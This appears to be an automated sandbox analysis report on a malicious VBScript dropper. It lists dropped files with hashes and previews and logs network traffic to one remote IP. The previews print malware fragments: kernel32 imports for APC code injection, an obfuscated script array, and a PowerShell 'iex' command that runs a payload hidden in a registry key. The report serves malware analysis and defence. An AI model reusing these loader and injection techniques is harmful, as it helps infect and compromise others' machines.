Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.c2racwwn.dll.mme.W32.mscor

C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\embezzle.zip Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	41733
Entropy (8bit):	7.990595739352001
Encrypted:	true
SSDEEP:	768:YyrsyvLjF/bGObAxySoqngTeHzD5CHD0q4NpJEB:nvLJ/oIZqngOwkNM
MD5:	03DCEA10BDACEE90CBBA66EC99F4C0E9
SHA1:	49F7A2F52552A21DC8262E56000A949BDE9F9BBE
SHA-256:	3EBEE8C3546A86708013A454701AD0B642EB1A4396722E50B84EA5E4373E86AA
SHA-512:	7EB0B59708E802A9621076C27BD09351CD1860111408AB993ECEA1E7C4BD4E9E6B5F95ED817F2BAB7F5380F284CF74CCA13AEDA4B1EB1F8353E1C79897D9FF9B
Malicious:	true
Preview:	PK..........tQTr..............onerous.tar..TS].0..!@..i.,.E.i"EQzW.(E.BGj.6...... 5TA...J...y.&RE..D.A"...E...\|3..e....o....s.>.....I..F.X`0..l.ls...&...?."....=...y.r.K...3p....{..g.3.../h.....`.....uL....sq.As..E.L..;.....{.............&/...............C.......A......{.....................r...c._.........e\.AXp......s....h.`u2...~.e..M....i.[9..?......=.fm../!;......l.u....\|..\..Y.....ag..W.(.Y..7l...h.p.\|...5<...^zsI..&..yh../.6.".i..n.<`.5`f...7@.........g.../..-.o.Z..5l........g.....""./.P......H.1.8.....\|.6.7.].4sT.".......f.#.H.01.H..9.q.....u./.ld..`.}?...9E.......X.@..n..)..Or....x.!..~>......r>.....I.).......ND....b.x3.1...QG.:v....,^,.X...FSx..3\|..._./..2cm.o...%...b!\%s..'...../.../..%./...\|.c.....CqTz"Wn`<b.Q....q......[.%..p.'B.j..........s.A.\|.$...- .!q..N.m..S>.`.8].D.E.q.....a.....4../D.G!......r.)..0.w..LQ...+..ci.x@+..\.>)..7.....@..L.G...a.8gR.7..%....~.e.....H.@n.B..>'...L.`n8v.q....*....2..p.2...;<..(.l..i....>....f.....@.m:.\|

C:\Users\user\AppData\Local\Temp\illegal.dds Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	43
Entropy (8bit):	4.646967661578215
Encrypted:	false
SSDEEP:	3:Ou2eZKQq+VP3n:3AQD
MD5:	38634869D064FBE23CE9F69FCC12F2FE
SHA1:	90C3A33305C346B5534CE2C7DB99D12A491F8F46
SHA-256:	8B30DFD23B27090F6F373E01CE08B94ADADCDC850869392D36D88D1AC43C7A3B
SHA-512:	B2D93381BA53C57F15824EA56611FC396BC0AC47905F3BA87F8CDB5857EB3DD14000443505B8D7A549E73D04A0A4136522D012F7EC9940F18519AD8F92DBAF83
Malicious:	false
Preview:	xQFDMtaNtmEeHCvwnKqXsCLoumCqeELEgNNlgNdvfuG

C:\Users\user\AppData\Local\Temp\onerous.tar Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	48128
Entropy (8bit):	7.655383585962167
Encrypted:	false
SSDEEP:	768:/JZ7EqWjTpGrg7iSh8NHj4DqVSoqngTeHzD5CHDFuGUJtB:xZ7Eq+T087E4DqVZqngOww7t
MD5:	79D81979DBBD1C8CEB04CC80A903ECD1
SHA1:	F40959018E132FB1430F77A26903AF222244676C
SHA-256:	5DD2F21B81330A342FE1BB9A17A8FDE423928E266D4842887F8B41E5D7C2FBD6
SHA-512:	AEEDE9ECC3CBFEF29AD5A1D3D4B66C245EC48E5C7407F81C7997049CE64009D80F7A97B17B8540AC247211478473ED5F1716E555E91EB64BDC94F632E90D15EC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L....o._...........!...I..................... ....@.................................j.....@.................................@...X....................................................................................................................text............................... ..`.data........ ......................@....reloc..............................@..B................U..}..u..*.............}..u.1....}..u.1....}..u.1.....SWV...a..............^_[.1.H)....a.u..j@h.0..h@...j.....@.Sh@...h. @.P......U..`.}..u..M..U..0......a.........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\p4xjawzl\CSCF25F578263E4AA98A5ACFCF8CC63832.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.113346013640851
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycak7YnqqiPN5Dlq5J:+RI+ycuZhN6akSiPNnqX
MD5:	843E186EEA14F8721EC18EAAE2BEFEB8
SHA1:	71890EC451C24DDDB90769B5E7CA9E059CC2EFEB
SHA-256:	376174315EAEC609682971E8E741E4F2F49E28DAD477E1F08DC36EDD97C02F66
SHA-512:	C427C1BD65F7398AC880247BDB80E3FD060E3772C811D963D28A8DD7F4218B71038B053DE2E899E802D1DE7B03169564BB0F4C626EB2024A81BA050596299B52
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.4.x.j.a.w.z.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.4.x.j.a.w.z.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	402
Entropy (8bit):	5.038590946267481
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
MD5:	D318CFA6F0AA6A796C421A261F345F96
SHA1:	8CC7A3E861751CD586D810AB0747F9C909E7F051
SHA-256:	F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
SHA-512:	10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.

C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.289280120575398
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f9lwsN+zxs7+AEszIWXp+N23f9lwk:p37Lvkmb6KH1SsN+WZE81SsvyA
MD5:	6CD9F2FF49F4F0B67B6B91905D26FE29
SHA1:	937F987E89B77ADFE88E2FADF3592A477C9438F7
SHA-256:	57F29034FFAF89F47584547B4F832607A25A2DACC4D8FFCBD5C8E8F584DF3654
SHA-512:	9C575DD8F3B75E61FAF0EB0C0806C6950B0391B190A7C0913A8F6A070C860A8F383F2AF07CCBC3B62D466272A6221F0562C1CF34463E7D575883CACA7D2DAF58
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.0.cs"

C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6125903932768533
Encrypted:	false
SSDEEP:	24:etGSi/W2Dg85xL/XsB4zCNBL4zqhRqPPtkZfQdGn+II+ycuZhN6akSiPNnq:6nWb5xL/O7zbuuJQdsn1ul6a3uq
MD5:	C8EAF421D7C91901A0F262FD69D0C9E1
SHA1:	65B6E3D81DFA7A43A35ACF524438907F953D9D57
SHA-256:	B0FEE24CD618FCEF2238D4B65633F0FAAA113128DA5610B2172816185F2AAF23
SHA-512:	68A96A30E253D1882E2EF3A0BC4D04AFB4CDB00905227BAC22F32673CA4B2F371AC59264854C916E9ECE27CEA35170AEC42A13D439461B272FECC4D6ABAB51B0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a............3./.....6.......C.......V................................................<Module>.p4xjawzl.dll.tba.W32.mscorlib.Syst

C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF52FAC1AE3B89C573.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40209
Entropy (8bit):	0.682199044002721
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+TtfW9IhSjId0LpFhSjId0LpChSjId0Lpf:kBqoxKAuqR+TtfW9IR0L/R0LkR0Lx
MD5:	E9EB6DAFE27EEBCA86590BCF2BCBE10D
SHA1:	0B46B1355AD9282BD5C88FE8D9CA22481A18F40A
SHA-256:	0782036424272A1B9017EBC8C799FAAB1611F4F0DE8E18EE66209706BAE3F254
SHA-512:	51DA2A49867BF7C721948422C1EAC9C504E392BE34DAF723DAFA744CD95AAA29E2E5DC4FA857D7F45B399EC6DDA3E6698A4E5A07E20C4BE98B7729044BED7B03
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6ED4DCCDF404F142.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40217
Entropy (8bit):	0.6852118039003574
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+eYSbIBeqseQcbeqseQcEeqseQch:kBqoxKAuqR+eYSbIBzzzszp
MD5:	E3E081478B4405BBFA315D978951F3D3
SHA1:	886EBA9879B36BD08EBA7F69ACEBA08CAC57E72B
SHA-256:	5DE4D74D5C1EB95C5F8AE3BCFA3AED5FEE0C667D23C81D19099CA7123B0CF06A
SHA-512:	B9E851AE80473FF6297E3D6DD72A8E137A19D7DE1CB99A9947EFBE9091F89862C1D53968156AADED4E12B5A5F7DCBBA063166FB533201767D843F17FD2006056
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF787E07F75238D826.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40201
Entropy (8bit):	0.6795062561153015
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+fBjKR4sANa/xkDsANa/xkksANa/xkx:kBqoxKAuqR+fBjKR47g5s7g5v7g5g
MD5:	73265CA38D76195CE4FCF5B44DD41DB0
SHA1:	0E4084B9D0643F65DD3B846A997550E0B9FD9D05
SHA-256:	1D15B9BFD311FB3BB015F6E5E62E42C4F11FDA6216CB2F98E5B0AEED7884E8AD
SHA-512:	6B66CB0249D0560805AA505342BF3CC83CF52391E76792D93E45731E2E35334F89DE70D49BD28AB891BE8C7DFB262A2FAB517837D20059B0C813EF33E19FBD65
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFEE8D66ECCEA54757.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13269
Entropy (8bit):	0.616056301099107
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo2F9lo69lWbq4tfsG4SVzQvmWF:kBqoIVDbq4tfsG4SRQvmWF
MD5:	14E2842DCFDC43121524E9A8D09EEEA0
SHA1:	14B4935C410F7796026E7F3B4C865712B2542A70
SHA-256:	BE4F78F4D214F5793078AEC70EA19F2E828EB8F2FBBC7ABEB8E12396E3152243
SHA-512:	603319E1CC9E9747982E6D2DBBA3987549B061BAFC136D5BAD4BD5FC2215B69BB3BB9F17C6BF51C52FD5C6CC8215AD35D9203BD38B0B93F74B7D5AE4A4DB39A1
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6} Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.229321939059696
Encrypted:	false
SSDEEP:	3:8RnuTfWuMoEXBVSDVlZFs:ynuT+uMoQqpFs
MD5:	D558E38A1F044C3A1D30F9561E03F453
SHA1:	0FC46EB8E1F95F86FEC754B0376F5793E9F94846
SHA-256:	9114C5A5A02405AE7BB9778DEE7F41FAA2B282B3A7889CDB22E9FC84A55269A8
SHA-512:	0D9FC7F3C8E3B6A2FBDECAD2DB37610DDE6888CC25B71418C0A0BC003232325D1C15749C0B5185712098DED6580FD0B82D1E66FC0995F6449201C382F80F54E9
Malicious:	false
Preview:	23-11-2020 16:13:05 \| "0x978f3b8f_5fa42a1d07530" \| 0..

C:\Users\user\Documents\20201123\PowerShell_transcript.061544.mzd2n066.20201123161207.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1189
Entropy (8bit):	5.313670369804363
Encrypted:	false
SSDEEP:	24:BxSAOxvBn6x2DOXUWOLCHGIYBtLWGHjeTKKjX4CIym1ZJXwHOLCHGIYBtjnxSAZS:BZKvh6oORF/GqDYB1ZCFiZZS
MD5:	8FC4E18E2D8ECA791A7E556817A08ACD
SHA1:	42AB040AD5FA02A32D843E8620BBB06FB750676A
SHA-256:	E3C9F15EA0CF9821417350EC711EC31AE2D2FE11C197777F199910C3A28DE8E2
SHA-512:	0E759C438EEEDF4BDB8FC466D8555EEF86B29D43AC8209953FFC1A1CBD3DD27BC2711DA5BB9A09ACDB3C066E8024C9AE28D399F0539CBE734F170B52030E9E74
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20201123161207..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 061544 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 5500..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20201123161207..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..********************..

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF, LF line terminators
Entropy (8bit):	5.2002853195325915
TrID:
File name:	JeSoTz0An7tn.vbs
File size:	445795
MD5:	575ea6ce44ca6db627a5082e266dcfca
SHA1:	921f7bd07ed116f3ba0c2def03749926708ac8f0
SHA256:	f7cb6062bdf33969b60f5fa4ba49274128108aae01b5b8dbff05b4b21cea66ea
SHA512:	07720a06ef7f81b2a3d3f3df8e3d8039b6f95a1c3ff9c7202f37cd55409a97863b6cf17bbe7f2df511502e29a7548a3fbdeaf1d167d3968bbad6bdbf73606138
SSDEEP:	3072:7nTIsaXlij8pCIduG4+QL461Qt0nOpgVU6LrrnEDP2GRs5WOZ4P5t:7ToU8pFXyMrY8gVU6HrAS5WOOt
File Content Preview:	const LrSi = 55..WnJRbTTy = Array(wsOR,PUo,GE,Fu,pVD,hJTl,hJTl,hJTl,iXZa,hJTl,TL,202,tJL,RDlH,XY,XM,195,eCyx,170,200,hJTl,hJTl,hJTl,227,hJTl,hJTl,vGvc,hJTl,hJTl,hJTl,Cisj,LJe,ZVmD,XM,Cisj,skWW,hWH,Fl,tJL,eH,XM,275,226,VcU,XY,Yh,WE,190,mO,SHE,iXZa,dcyA,NB,

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2020 16:11:47.211673021 CET	49723	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:47.212605953 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:47.477448940 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:47.477633953 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:47.478786945 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:47.479947090 CET	80	49723	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:47.480084896 CET	49723	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:47.783910036 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.498064041 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.498085022 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.498096943 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.498110056 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.498131990 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.498152971 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.498239994 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.498290062 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.498296976 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.541169882 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.541198015 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.541218042 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.541237116 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.541306019 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.541328907 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.541332006 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.762972116 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763001919 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763027906 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763053894 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763072014 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763091087 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763113022 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763119936 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.763135910 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763150930 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.763159990 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763183117 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763189077 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.763207912 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763231039 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.763232946 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.763257027 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.763288021 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.806231976 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.806272030 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.806293011 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.806312084 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.806332111 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.806334972 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.806391954 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.806399107 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.806402922 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.920389891 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.920461893 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.920510054 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.920559883 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:48.965265036 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:48.965449095 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.027954102 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.027987957 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028011084 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028036118 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028059006 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028079033 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028100014 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028111935 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.028120995 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028142929 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028145075 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.028150082 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.028155088 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.028163910 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028186083 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.028187990 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028213978 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028235912 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028239012 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.028259993 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028275967 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.028294086 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.028376102 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.131920099 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.131952047 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.131980896 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.132004023 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.132029057 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.132046938 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.132069111 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.132078886 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.132092953 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.132111073 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.132116079 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.132128000 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.132148981 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.132164001 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.177836895 CET	80	49724	47.241.19.44	192.168.2.3
